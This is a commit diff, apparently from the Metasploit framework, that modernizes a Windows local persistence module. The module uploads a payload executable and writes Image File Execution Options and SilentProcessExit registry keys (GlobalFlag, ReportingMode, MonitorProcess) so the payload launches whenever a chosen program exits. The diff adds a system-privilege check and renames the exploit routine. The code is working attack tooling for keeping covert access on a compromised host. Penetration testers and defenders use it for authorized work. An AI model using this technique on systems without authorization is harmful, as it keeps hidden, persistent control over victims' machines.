modernizing windows persistence

h00die · h00die · commit 01a07ac9a175 · 2025-09-23T16:39:56.000-04:00
diff --git a/modules/exploits/windows/persistence/image_exec_options.rb b/modules/exploits/windows/persistence/image_exec_options.rb
@@ -10,6 +10,10 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Post::Windows::Priv
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/persistence_image_exec_options'
 
   def initialize(info = {})
     super(
@@ -34,12 +38,9 @@ def initialize(info = {})
         'DefaultTarget' => 0,
         'DisclosureDate' => '2008-06-28',
         'References' => [
-          ['URL', 'https://attack.mitre.org/techniques/T1183/'],
+          ['ATT&CK', Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],
           ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']
         ],
-        'DefaultOptions' => {
-          'DisablePayloadHandler' => true
-        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -48,21 +49,36 @@ def initialize(info = {})
           }
         },
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
         }
       )
     )
     register_options([
       OptString.new('PAYLOAD_NAME',
                     [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
-      OptString.new('PATH', [false, 'Path to write payload(%TEMP% by default).', nil]),
       OptString.new('IMAGE_FILE', [true, 'Binary to "debug"', nil])
 
     ])
   end
 
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('%TEMP%')
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+
+    return CheckCode::Safe('You must be System to run this Module') unless is_system?
+
+    CheckCode::Appears('Likely exploitable')
+  end
+
   def upload_payload(dest_pathname)
     payload_exe = generate_payload_exe
     write_file(dest_pathname, payload_exe)
@@ -71,7 +87,7 @@ def upload_payload(dest_pathname)
 
   def validate_active_host
     unless is_system?
-      fail_with(Failure::NoAccess, "You must be System to run this Module")
+      fail_with(Failure::NoAccess, 'You must be System to run this Module')
     end
 
     begin
@@ -85,18 +101,18 @@ def validate_active_host
   def write_reg_keys(image_file, payload_pathname)
     reg_keys = []
     reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",
-                  value_name: "GlobalFlag",
-                  type: "REG_DWORD",
+                  value_name: 'GlobalFlag',
+                  type: 'REG_DWORD',
                   value_value: 512)
     reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
-                  value_name: "ReportingMode",
-                  type: "REG_DWORD",
+                  value_name: 'ReportingMode',
+                  type: 'REG_DWORD',
                   value_value: 1)
     reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
-                  value_name: "MonitorProcess",
-                  type: "REG_SZ",
+                  value_name: 'MonitorProcess',
+                  type: 'REG_SZ',
                   value_value: payload_pathname)
-    silent_process_exit_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit"
+    silent_process_exit_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'
     registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)
     reg_keys.each do |key|
       registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])
@@ -109,12 +125,12 @@ def write_reg_keys(image_file, payload_pathname)
     end
   end
 
-  def exploit
+  def install_persistence
     validate_active_host
-    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
-    temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    temp_path = writable_dir
     image_file = datastore['IMAGE_FILE']
-    payload_pathname = temp_path + "\\" + payload_name + '.exe'
+    payload_pathname = temp_path + '\\' + payload_name + '.exe'
     vprint_status("Payload pathname = #{payload_pathname}")
     upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)
   end
